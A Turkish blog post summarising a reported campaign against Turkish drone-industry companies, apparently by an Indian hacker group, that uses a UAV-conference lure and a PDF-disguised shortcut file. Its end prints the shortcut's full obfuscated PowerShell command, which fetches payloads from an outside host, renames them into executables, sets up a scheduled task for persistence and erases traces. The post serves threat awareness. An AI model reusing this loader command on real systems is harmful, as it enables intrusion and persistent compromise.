Türk Savunma Sanayisi, Hintli Hackerların Hedefinde!
- Ahmet BİRKAN
- 25 Tem
- 2 dakikada okunur
Güncelleme tarihi: 26 Tem
Merhaba arkadaşlar,Bu yazıda sizlere hem ülkemiz hem de siber güvenlik dünyası açısından oldukça önemli bir konudan bahsetmek istiyorum.
Geçtiğimiz günlerde arcticwolf.com sitesinde yayımlanan bir makalede, Türk savunma sanayisinin, özellikle de insansız hava araçları (İHA) alanında faaliyet gösteren şirketlerin, Hintli olduğu düşünülen bir hacker grubu tarafından hedef alındığı bildirildi.
Saldırının Arka Planı
Bu saldırıların, son zamanlarda Hindistan ile Pakistan arasındaki savaş gerilimi çerçevesinde gerçekleştiği, Türkiye'nin Pakistan'a olan desteği nedeniyle hedef haline geldiği öne sürülüyor. Özellikle, Türkiye’nin savunma sanayisi içindeki stratejik konumu ve Pakistan’a yönelik iş birlikleri, Hintli hackerların dikkatini çekmiş gibi görünüyor.
Hedef: İHA Konferansı
Makalede, 28-29 Temmuz tarihlerinde İstanbul’da düzenlenmesi planlanan bir İHA konferansına özel bir vurgu yapılmış. Bu etkinliği bir fırsat olarak gören saldırganlar, sosyal mühendislik yöntemlerini kullanarak, bu alanda çalışan Türk şirketlerine sızmaya çalışmışlar.
Saldırı yöntemi oldukça dikkat çekici:
PDF gibi görünen ancak .lnk uzantılı (kısayol) bir dosya hedefe gönderiliyor.
Bu dosya çalıştırıldığında, arka planda PowerShell komutları yardımıyla zararlı yazılım sistemde çalışıyor.
Sürecin tespit edilmemesi için ise karmaşıklaştırma (obfuscation) yöntemleri kullanılmış. Böylece güvenlik duvarları veya antivirüs yazılımlarının bu zararlıyı kolayca tespit etmesi engellenmiş.
Zararlı Yazılım Analizi
Bir sonraki bölümde bu zararlı yazılımı analiz edeceğiz. Obfuscation (karmaşıklaştırma) işlemleri ortadan kaldırıldığında, bu kötü amaçlı kodun sistemde tam olarak neler yaptığını daha net göreceğiz.
Bu saldırı, hem kurumsal bilgi güvenliğinin hem de milli siber güvenlik stratejilerinin ne kadar kritik olduğunu bir kez daha ortaya koyuyor.
Detaylı teknik inceleme ve zararlı yazılım analizi için takipte kalın.
RelativePath: ..\..\..\..\..\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
WorkingDir:
CommandLineArguments: ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et
$a//expouav.org/download/fetch/list3/127717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile
"$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";'wg''et
$a//expouav.org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile "$c\Tasks\lama";r''e''n -Path
"$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "")
;'wg''et
$a//expouav.org/download/fetch/list3/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile "$c\Tasks\lake";r''e''n -Path
"$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "")
;'wg''et
$a//expouav.org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile "$c\Tasks\dalai";r''e''n -Path
"$c\Tasks\winver.pepxpe" -NewName ((Split-Path "$c\Tasks\winver.pepxpe" -Leaf) -replace "p", "");c''p''i
;$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -Destination ..;'wg''et
$a//expouav.org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da9b2187 -Outfile
"$c\Tasks\vlc.log";$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr',
"$c\Tasks\vlc", '/f';e''r''a''s'e *d?.?n?
IconLocation: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe



Yorumlar